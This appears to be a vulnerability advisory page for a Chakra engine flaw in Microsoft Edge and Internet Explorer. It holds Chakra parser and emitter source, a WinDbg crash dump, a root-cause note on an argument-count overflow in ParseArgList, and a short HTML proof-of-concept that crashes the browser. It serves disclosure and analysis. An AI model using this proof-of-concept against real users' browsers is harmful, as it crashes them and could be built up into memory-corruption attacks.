EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->sxBin.pnode1->location, callSiteId, argIndex); } else { byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->sxBin.pnode1->location, callSiteId); } if (fAssignRegs) { funcInfo->ReleaseLoc(pnode->sxBin.pnode1); } pnode = pnode->sxBin.pnode2; } // If this is a put, the call target has already been evaluated (see EmitReference). if (fAssignRegs) { Emit(pnode, byteCodeGenerator, funcInfo, false); } if (pnode->nop == knopEllipsis) { Assert(spreadIndices != nullptr); spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this' EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->location, callSiteId, argIndex); } else { byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->location, callSiteId); } if (fAssignRegs) { funcInfo->ReleaseLoc(pnode); } } return argIndex; } Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00007ff6`56460000 00007ff6`56485000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe ModLoad: 00007ffd`4cba0000 00007ffd`4cd7b000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 00007ffd`4ad90000 00007ffd`4ae3e000 C:\Windows\System32\KERNEL32.DLL ModLoad: 00007ffd`49c00000 00007ffd`49e49000 C:\Windows\System32\KERNELBASE.dll ModLoad: 00007ffd`475e0000 00007ffd`4765e000 C:\Windows\SYSTEM32\apphelp.dll ModLoad: 00007ffd`4a1a0000 00007ffd`4a499000 C:\Windows\System32\combase.dll ModLoad: 00007ffd`499b0000 00007ffd`49aa6000 C:\Windows\System32\ucrtbase.dll ModLoad: 00007ffd`4b250000 00007ffd`4b375000 C:\Windows\System32\RPCRT4.dll ModLoad: 00007ffd`49eb0000 00007ffd`49f1a000 C:\Windows\System32\bcryptPrimitives.dll ModLoad: 00007ffd`4a100000 00007ffd`4a19d000 C:\Windows\System32\msvcrt.dll ModLoad: 00007ffd`43c40000 00007ffd`43ca0000 C:\Windows\SYSTEM32\wincorlib.DLL ModLoad: 00007ffd`4b380000 00007ffd`4b440000 C:\Windows\System32\OLEAUT32.dll ModLoad: 00007ffd`49b60000 00007ffd`49bfa000 C:\Windows\System32\msvcp_win.dll ModLoad: 00007ffd`490a0000 00007ffd`490b1000 C:\Windows\System32\kernel.appcore.dll ModLoad: 00007ffd`2c870000 00007ffd`2cc34000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll ModLoad: 00007ffd`492b0000 00007ffd`499a2000 C:\Windows\System32\Windows.Storage.dll ModLoad: 00007ffd`4b4f0000 00007ffd`4b591000 C:\Windows\System32\advapi32.dll ModLoad: 00007ffd`4b1f0000 00007ffd`4b249000 C:\Windows\System32\sechost.dll ModLoad: 00007ffd`4cb40000 00007ffd`4cb91000 C:\Windows\System32\shlwapi.dll ModLoad: 00007ffd`4a8e0000 00007ffd`4a907000 C:\Windows\System32\GDI32.dll ModLoad: 00007ffd`49f20000 00007ffd`4a0a8000 C:\Windows\System32\gdi32full.dll ModLoad: 00007ffd`4c9f0000 00007ffd`4cb3a000 C:\Windows\System32\USER32.dll ModLoad: 00007ffd`41cb0000 00007ffd`41f36000 C:\Windows\SYSTEM32\iertutil.dll ModLoad: 00007ffd`490c0000 00007ffd`490de000 C:\Windows\System32\win32u.dll ModLoad: 00007ffd`4a9c0000 00007ffd`4aa6a000 C:\Windows\System32\shcore.dll ModLoad: 00007ffd`49030000 00007ffd`4907c000 C:\Windows\System32\powrprof.dll ModLoad: 00007ffd`49010000 00007ffd`49025000 C:\Windows\System32\profapi.dll ModLoad: 00007ffd`48310000 00007ffd`48341000 C:\Windows\SYSTEM32\ntmarta.dll ModLoad: 00007ffd`48f10000 00007ffd`48f39000 C:\Windows\SYSTEM32\USERENV.dll ModLoad: 00007ffd`486a0000 00007ffd`48744000 C:\Windows\SYSTEM32\DNSAPI.dll ModLoad: 00007ffd`4b030000 00007ffd`4b09c000 C:\Windows\System32\WS2_32.dll ModLoad: 00007ffd`4a9b0000 00007ffd`4a9b8000 C:\Windows\System32\NSI.dll ModLoad: 00007ffd`38c70000 00007ffd`38c96000 C:\Windows\SYSTEM32\clipc.dll ModLoad: 00007ffd`48a60000 00007ffd`48a77000 C:\Windows\SYSTEM32\cryptsp.dll ModLoad: 00007ffd`4b4a0000 00007ffd`4b4cd000 C:\Windows\System32\IMM32.DLL ModLoad: 00007ffd`48660000 00007ffd`48697000 C:\Windows\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffd`479c0000 00007ffd`47b30000 C:\Windows\SYSTEM32\twinapi.appcore.dll ModLoad: 00007ffd`48ee0000 00007ffd`48f05000 C:\Windows\SYSTEM32\bcrypt.dll ModLoad: 00007ffd`48140000 00007ffd`48161000 C:\Windows\SYSTEM32\profext.dll ModLoad: 00007ffd`38a20000 00007ffd`38a94000 C:\Windows\SYSTEM32\msiso.dll ModLoad: 00007ffd`3e660000 00007ffd`3e682000 C:\Windows\SYSTEM32\EShims.dll ModLoad: 00007ffd`3d710000 00007ffd`3d72b000 C:\Windows\SYSTEM32\MPR.dll ModLoad: 00007ffd`4b0a0000 00007ffd`4b1e5000 C:\Windows\System32\ole32.dll ModLoad: 00007ffd`47830000 00007ffd`478c5000 C:\Windows\system32\uxtheme.dll ModLoad: 00007ffd`379c0000 00007ffd`37a61000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll ModLoad: 00007ffd`2df90000 00007ffd`2f641000 C:\Windows\SYSTEM32\edgehtml.dll ModLoad: 00007ffd`2d730000 00007ffd`2df1b000 C:\Windows\SYSTEM32\chakra.dll ModLoad: 00007ffd`45500000 00007ffd`45639000 C:\Windows\SYSTEM32\wintypes.dll ModLoad: 00007ffd`3e0a0000 00007ffd`3e0df000 C:\Windows\SYSTEM32\MLANG.dll ModLoad: 00007ffd`45c20000 00007ffd`45c96000 C:\Windows\SYSTEM32\policymanager.dll ModLoad: 00007ffd`45b90000 00007ffd`45c1f000 C:\Windows\SYSTEM32\msvcp110_win.dll ModLoad: 00007ffd`45fb0000 00007ffd`46146000 C:\Windows\SYSTEM32\PROPSYS.dll ModLoad: 00007ffd`39b50000 00007ffd`39c1b000 C:\Windows\System32\ieproxy.dll ModLoad: 00007ffd`436b0000 00007ffd`437b6000 C:\Windows\System32\Windows.UI.dll ModLoad: 00007ffd`435e0000 00007ffd`43662000 C:\Windows\SYSTEM32\TextInputFramework.dll ModLoad: 00007ffd`46eb0000 00007ffd`46f93000 C:\Windows\SYSTEM32\CoreMessaging.dll ModLoad: 00007ffd`44b90000 00007ffd`44e62000 C:\Windows\SYSTEM32\CoreUIComponents.dll ModLoad: 00007ffd`45b70000 00007ffd`45b85000 C:\Windows\SYSTEM32\usermgrcli.dll ModLoad: 00007ffd`44040000 00007ffd`44571000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll ModLoad: 00007ffd`4b5a0000 00007ffd`4c9d7000 C:\Windows\System32\shell32.dll ModLoad: 00007ffd`4a0b0000 00007ffd`4a0f9000 C:\Windows\System32\cfgmgr32.dll ModLoad: 00007ffd`46150000 00007ffd`4617a000 C:\Windows\SYSTEM32\dwmapi.dll ModLoad: 00007ffd`39200000 00007ffd`3952e000 C:\Windows\SYSTEM32\WININET.dll ModLoad: 00007ffd`4ac20000 00007ffd`4ad86000 C:\Windows\System32\msctf.dll ModLoad: 00007ffd`48f40000 00007ffd`48f70000 C:\Windows\SYSTEM32\SspiCli.dll ModLoad: 00007ffd`43860000 00007ffd`43962000 C:\Windows\SYSTEM32\mrmcorer.dll ModLoad: 00007ffd`36760000 00007ffd`36770000 C:\Windows\SYSTEM32\tokenbinding.dll ModLoad: 00007ffd`43ba0000 00007ffd`43c09000 C:\Windows\SYSTEM32\Bcp47Langs.dll ModLoad: 00007ffd`396b0000 00007ffd`396cb000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll ModLoad: 00007ffd`400d0000 00007ffd`401a7000 C:\Windows\SYSTEM32\winhttp.dll ModLoad: 00007ffd`488c0000 00007ffd`4891c000 C:\Windows\system32\mswsock.dll ModLoad: 00007ffd`42450000 00007ffd`4245b000 C:\Windows\SYSTEM32\WINNSI.DLL ModLoad: 00007ffd`41940000 00007ffd`41b08000 C:\Windows\SYSTEM32\urlmon.dll ModLoad: 00007ffd`48a80000 00007ffd`48a8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL ModLoad: 00007ffd`36f20000 00007ffd`36f3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll ModLoad: 00007ffd`38ae0000 00007ffd`38c6a000 C:\Windows\SYSTEM32\ieapfltr.dll ModLoad: 00007ffd`47670000 00007ffd`4768d000 C:\Windows\System32\rmclient.dll ModLoad: 00007ffd`34410000 00007ffd`34457000 C:\Windows\system32\dataexchange.dll ModLoad: 00007ffd`46fa0000 00007ffd`470c2000 C:\Windows\SYSTEM32\dcomp.dll ModLoad: 00007ffd`46620000 00007ffd`468ff000 C:\Windows\SYSTEM32\d3d11.dll ModLoad: 00007ffd`47e80000 00007ffd`47f24000 C:\Windows\SYSTEM32\dxgi.dll ModLoad: 00007ffd`35bb0000 00007ffd`35bc8000 C:\Windows\System32\UiaManager.dll ModLoad: 00007ffd`37e60000 00007ffd`37ee2000 C:\Windows\system32\twinapi.dll ModLoad: 00007ffd`2d700000 00007ffd`2d728000 C:\Windows\SYSTEM32\srpapi.dll ModLoad: 00007ffd`490e0000 00007ffd`492a9000 C:\Windows\System32\CRYPT32.dll ModLoad: 00007ffd`49080000 00007ffd`49091000 C:\Windows\System32\MSASN1.dll ModLoad: 00007ffd`30870000 00007ffd`308ea000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll ModLoad: 00007ffd`385b0000 00007ffd`3860d000 C:\Windows\SYSTEM32\ninput.dll ModLoad: 00007ffd`46900000 00007ffd`46ea4000 C:\Windows\SYSTEM32\d2d1.dll ModLoad: 00007ffd`40390000 00007ffd`4064f000 C:\Windows\SYSTEM32\DWrite.dll ModLoad: 00007ffd`30470000 00007ffd`304ca000 C:\Windows\System32\Windows.Graphics.dll ModLoad: 00007ffd`2d6f0000 00007ffd`2d6ff000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll ModLoad: 00007ffd`448a0000 00007ffd`448e2000 C:\Windows\SYSTEM32\vm3dum64.dll ModLoad: 00007ffd`44680000 00007ffd`446e7000 C:\Windows\SYSTEM32\D3D10Level9.dll ModLoad: 00007ffd`37780000 00007ffd`377eb000 C:\Windows\System32\oleacc.dll ModLoad: 00007ffd`2d6e0000 00007ffd`2d6f0000 C:\Windows\system32\msimtf.dll ModLoad: 00007ffd`40030000 00007ffd`400b8000 C:\Windows\system32\directmanipulation.dll ModLoad: 00007ffd`39af0000 00007ffd`39b04000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll ModLoad: 00007ffd`3f270000 00007ffd`3f2a8000 C:\Windows\System32\smartscreenps.dll ModLoad: 00007ffd`377f0000 00007ffd`379b5000 C:\Windows\System32\uiautomationcore.dll ModLoad: 00007ffd`40200000 00007ffd`40388000 C:\Windows\SYSTEM32\windows.globalization.dll (18bc.14e0): Access violation - code c0000005 (!!! second chance !!!) chakra!EmitArgs+0xddda3: 00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=???????? 0:016> r rax=0000000000000000 rbx=0000006a8f7faeb0 rcx=0000000000000001 rdx=0000019df75e3040 rsi=0000000000000002 rdi=0000006a8f7fa9c0 rip=00007ffd2da3132f rsp=0000006a8f7fb0f0 rbp=0000006a8f7fb8f0 r8=0000000000000000 r9=0000000000000000 r10=0000000000000009 r11=0000019df75ff04d r12=0000000000000001 r13=0000000000000000 r14=0000006a8f7fb8f0 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200 chakra!EmitArgs+0xddda3: 00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=???????? 0:016> ub chakra!EmitArgListEnd+0xdde2c: 00007ffd`2da3130c 0f856022f2ff jne chakra!EmitArgListEnd+0x92 (00007ffd`2d953572) 00007ffd`2da31312 0fb7c6 movzx eax,si 00007ffd`2da31315 e95b22f2ff jmp chakra!EmitArgListEnd+0x95 (00007ffd`2d953575) 00007ffd`2da3131a 410fb7c4 movzx eax,r12w 00007ffd`2da3131e 664403e2 add r12w,dx 00007ffd`2da31322 0fb7cf movzx ecx,di 00007ffd`2da31325 03ca add ecx,edx 00007ffd`2da31327 488b942498000000 mov rdx,qword ptr [rsp+98h] 0:016> u chakra!EmitArgs+0xddda3: 00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx 00007ffd`2da31334 488d4c2440 lea rcx,[rsp+40h] 00007ffd`2da31339 488b4328 mov rax,qword ptr [rbx+28h] 00007ffd`2da3133d 48894c2420 mov qword ptr [rsp+20h],rcx 00007ffd`2da31342 488bcd mov rcx,rbp 00007ffd`2da31345 448b400c mov r8d,dword ptr [rax+0Ch] 00007ffd`2da31349 e8229c2300 call chakra!EmitSpreadArgToListBytecodeInstr (00007ffd`2dc6af70) 00007ffd`2da3134e 0fb77c2440 movzx edi,word ptr [rsp+40h] 0:016> kb RetAddr : Args to Child : Call Site 00007ffd`2d953484 : 0000019d`f64e8aa0 00007ffd`00000001 0000006a`8f7fb8f0 0000019d`f75e3040 : chakra!EmitArgs+0xddda3 00007ffd`2d952850 : 0000019d`f64e8aa0 0000019d`ffffffff 0000019d`ffffffff 0000006a`ffffffff : chakra!EmitArgList+0x9c 00007ffd`2d8d3768 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!EmitNew+0x16c 00007ffd`2d8d2c55 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!Emit+0x15d8 00007ffd`2d8dd790 : 0000019d`f64e8810 0000006a`8f7fb8f0 0000019d`f75e3040 0000006a`00000001 : chakra!Emit+0xac5 00007ffd`2d8db4b9 : 0000006a`8f7fb8f0 0000019d`f64e8810 0000019d`f75e3040 0000006a`00000001 : chakra!ByteCodeGenerator::EmitTopLevelStatement+0x80 00007ffd`2d8daee5 : 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 0000019d`f75e3040 : chakra!ByteCodeGenerator::EmitGlobalBody+0x75 00007ffd`2d8da274 : 0000006a`8f7fb8f0 0000019d`f64e8030 0000019d`f75e3030 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitOneFunction+0xa75 00007ffd`2d9826aa : 0000006a`8f7fb8f0 0000019d`f64e8030 00000000`00000000 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitScopeList+0x164 00007ffd`2d982541 : 0000019d`f64e8030 0000019d`00003c22 0000006a`8f7fb8f0 0000006a`8f7fbb30 : chakra!ByteCodeGenerator::Generate+0x142 00007ffd`2d7a2820 : 0000019d`f64e8030 0000019d`00003c22 0000019d`f2b2d110 0000006a`8f7fbb30 : chakra!GenerateByteCode+0x8d 00007ffd`2d748201 : 0000019d`f2b2d110 0000019d`f67c0020 0000019d`00050022 0000006a`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x380 00007ffd`2d747fb8 : 0000019d`f6260000 00007ffd`2de79f80 0000019d`00000000 0000019d`f625c000 : chakra!Js::GlobalObject::VEval+0x231 00007ffd`2d747ecd : 0000006a`8f7fc0d0 0000019d`f625b5c0 0000019d`f2b2a150 0000006a`8f7fc090 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8 00007ffd`2d9a6be3 : 0000019d`f625b5c0 00000000`18000003 0000019d`f6270020 0000019d`f628ef00 : chakra!Js::GlobalObject::EntryEval+0x7d 00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000018 0000006a`8f7fc330 00000000`00000006 : chakra!amd64_CallFunction+0x93 00007ffd`2d7571ac : 0000019d`f625b5c0 00007ffd`2d747e50 0000006a`8f7fc1a0 0000006a`8f7fc330 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83 00007ffd`2d7577b4 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`f625b5c0 00007ffd`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114 00007ffd`2d834920 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`8f7fc330 0000019d`f64e00a8 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c 00007ffd`2d82ff2c : 0000006a`8f7fc330 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250 00007ffd`2d8c80cc : 0000006a`8f7fc330 0000019d`f64c0000 0000006a`8f7fc4f0 00007ffd`4cc05401 : chakra!Js::InterpreterStackFrame::Process+0x12c 00007ffd`2d8c7be1 : 0000019d`f6280420 0000006a`8f7fc6d0 0000019d`f6500fc2 0000006a`8f7fc6e8 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 0000019d`f6500fc2 : 0000006a`8f7fc720 00000000`00000000 00000000`00000000 00007ffd`2d9a6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51 00007ffd`2d9a6be3 : 0000019d`f6280420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x19d`f6500fc2 00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000000 0000019d`f2b50c00 00007ffd`2d8aa837 : chakra!amd64_CallFunction+0x93 00007ffd`2d8c1810 : 0000019d`f6280420 00007ffd`2d9a6df0 0000006a`8f7fc820 0000019d`f2b2d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83 00007ffd`2d8c0a37 : 0000019d`f6280420 0000006a`8f7fc910 0000019d`f2b2d110 00007ffd`4a167100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100 00007ffd`2d98907e : 0000019d`f6280420 0000006a`8f7fc970 0000019d`f2b2d110 0000019d`f2b2da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b 00007ffd`2d8ecd54 : 0000019d`f6280420 0000006a`8f7fc9b0 00000000`00000000 0000006a`8f7fc9c8 : chakra!ScriptSite::CallRootFunction+0x6a 00007ffd`2d881b49 : 0000019d`f2b2d000 0000019d`f6280420 0000006a`8f7fca60 00000000`00000000 : chakra!ScriptSite::Execute+0x124 00007ffd`2d882e8e : 0000019d`f2b29d00 0000006a`8f7fcf68 0000006a`8f7fcfa0 0000006a`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5 00007ffd`2d883121 : 0000019d`f2b29d00 0000019d`f370c4c4 00000000`00000000 0000019d`f2cb4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436 00007ffd`2e393c75 : 0000019d`f2b29d50 0000019d`f370c4c4 0000019d`0000008a 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1 00007ffd`2e393abe : 00000000`00000000 0000006a`8f7fce39 0000019d`f2cb4260 0000019d`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119 00007ffd`2e3935d7 : 00000000`00000000 0000019d`f2cb4260 0000019d`f2c3c1c0 0000019d`f2cb41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202 00007ffd`2e392f07 : 0000019d`f2c50c01 0000019d`f2cac100 0000019d`00000082 00007ffd`00000000 : edgehtml!CScriptData::CommitCode+0x357 00007ffd`2e452f8d : 00000000`ffffffff 0000019d`f2c3c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f 00007ffd`2e2943d4 : 00000000`00000000 0000019d`f2c8c440 00000000`00000001 00007ffd`2e44ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d 00007ffd`2e2934a1 : 0000019d`f2c50c00 00000000`00000000 0000019d`f2c50c00 0000019d`f2c2c8c0 : edgehtml!CHtmParseBase::Execute+0x204 00007ffd`2e44d23b : 00000000`00019717 0000019d`f2c20000 0000019d`f2c800b0 0000019d`f2c2c8c0 : edgehtml!CHtmPost::Exec+0x1e1 00007ffd`2e44d11f : 0000019d`f2c2c8c0 00000000`00019717 0000019d`f37e6dc0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f 00007ffd`2e44cfd3 : 0000019d`f2c20000 00000000`06363701 00000000`00000002 0000019d`f2c61740 : edgehtml!PostManExecute+0x63 00007ffd`2e44ce6d : 0000019d`f2c2c8c0 00000000`06363729 0000019d`00000000 00007ffd`41cd4779 : edgehtml!PostManResume+0xa3 00007ffd`2e45b353 : 0000019d`f2c48600 0000019d`f3734bd0 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d 00007ffd`2e4350db : 0000019d`f2c282d0 0000019d`f2b25491 0000019d`f2b02200 0000006a`8f7fd4f0 : edgehtml!CDwnChan::OnMethodCall+0x23 00007ffd`2e2c1706 : 0000019d`f2b02728 0000019d`f2c61740 0000019d`f2b02260 0000006a`8f7fd520 : edgehtml!GWndAsyncTask::Run+0x1b 00007ffd`2e40a860 : 00000000`0e877146 0000019d`f2c617a0 0000019d`f2c800b0 00007ffd`2e369138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236 00007ffd`2e40a683 : 0000019d`f3734bd0 00000000`00000000 00000000`00000002 0000019d`f2c28170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70 00007ffd`2e2c22b3 : 0000006a`8f7fd9d0 00000000`00008002 0000019d`f2c28170 00007ffd`4ca147df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3 00007ffd`2e2c07a5 : 00000000`00008002 0000019d`f2c20000 000042e1`6a33249e 00007ffd`2e33721d : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53 00007ffd`4c9fbc50 : 00000000`00010442 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125 00007ffd`4c9fb5cf : 00000195`f12868c0 00007ffd`2e2c0680 00000000`00010442 00000000`00010442 : USER32!UserCallWinProcCheckWow+0x280 00007ffd`2c876d0e : 0000006a`8f7fd970 00000000`00000000 00000195`f0cd3840 00000000`00000000 : USER32!DispatchMessageWorker+0x19f 00007ffd`2c88eecb : 00000000`00000000 00000000`00000001 00000195`f0f29cd0 00000195`f0cc3960 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee 00007ffd`38a2b4a8 : 00000000`00000000 00000195`f0f28990 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab 00007ffd`4ada2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48 00007ffd`4cc10d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 The root cause of the nullptr derefrencing is an overflow in Parser::ParseArgList //ChakraCore-master\lib\Parser\Parse.cpp /*************************************************************************** Parse a list of arguments. ***************************************************************************/ template<bool buildAST> ParseNodePtr Parser::ParseArgList( bool *pCallOfConstants, uint16 *pSpreadArgCount, uint16 * pCount) { ParseNodePtr pnodeArg; ParseNodePtr pnodeList = nullptr; ParseNodePtr *lastNodeRef = nullptr; // Check for an empty list Assert(m_token.tk == tkLParen); if (m_pscan->Scan() == tkRParen) { return nullptr; } *pCallOfConstants = true; *pSpreadArgCount = 0; int count=0; while (true) { // the count of arguments has to fit in an unsigned short if (count > 0xffffU) //SHOULD BE if (count >= oxffffU) Error(ERRnoMemory); // Allow spread in argument lists. IdentToken token; pnodeArg = ParseExpr<buildAST>(koplCma, nullptr, TRUE, /* fAllowEllipsis */TRUE, NULL, nullptr, nullptr, &token); ++count; //when count==0xffffU, an overflow occurs HERE!!! this->MarkEscapingRef(pnodeArg, &token); if (buildAST) { this->CheckArguments(pnodeArg); if (*pCallOfConstants && !IsConstantInFunctionCall(pnodeArg)) { *pCallOfConstants = false; } if (pnodeArg->nop == knopEllipsis) { (*pSpreadArgCount)++; } AddToNodeListEscapedUse(&pnodeList, &lastNodeRef, pnodeArg); } if (m_token.tk != tkComma) { break; } m_pscan->Scan(); if (m_token.tk == tkRParen && m_scriptContext->GetConfig()->IsES7TrailingCommaEnabled()) { break; } } if (pSpreadArgCount!=nullptr && (*pSpreadArgCount) > 0){ CHAKRATEL_LANGSTATS_INC_LANGFEATURECOUNT(SpreadFeature, m_scriptContext); } *pCount = static_cast<uint16>(count); if (buildAST) { AssertMem(lastNodeRef); AssertNodeMem(*lastNodeRef); pnodeList->ichLim = (*lastNodeRef)->ichLim; } return pnodeList; } --> <html> <head> <title> POC </title> </head> <script> var a=[]; a.length=0xFFFF+1; a.fill('...a'); var b="function Car(){}; var car=new Car("+a.join()+");"; //alert(b); eval(b); </script> </html>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 10

Microsoft>>Windows_server_2012 >> Version -

Configuraton 0

Microsoft>>Internet_explorer >> Version 11

Microsoft>>Windows_10 >> Version -

Microsoft>>Windows_10 >> Version 1511

Microsoft>>Windows_10 >> Version 1607

Microsoft>>Windows_10 >> Version 1703

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_8.1 >> Version -

Microsoft>>Windows_rt_8.1 >> Version -

Microsoft>>Windows_server_2008 >> Version r2

Microsoft>>Windows_server_2012 >> Version r2

Microsoft>>Windows_server_2016 >> Version -

Configuraton 0

Microsoft>>Internet_explorer >> Version 9

Microsoft>>Windows_server_2008 >> Version -

Configuraton 0

Microsoft>>Edge >> Version -

Microsoft>>Windows_10 >> Version -

Microsoft>>Windows_10 >> Version 1511

Microsoft>>Windows_10 >> Version 1607

Microsoft>>Windows_10 >> Version 1703

Microsoft>>Windows_server_2016 >> Version -

Références

http://www.securityfocus.com/bid/100056
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/42466/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/42467/
Tags : exploit, x_refsource_EXPLOIT-DB
https://www.exploit-db.com/exploits/42468/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securitytracker.com/id/1039095
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securitytracker.com/id/1039094
Tags : vdb-entry, x_refsource_SECTRACK
https://www.exploit-db.com/exploits/42478/
Tags : exploit, x_refsource_EXPLOIT-DB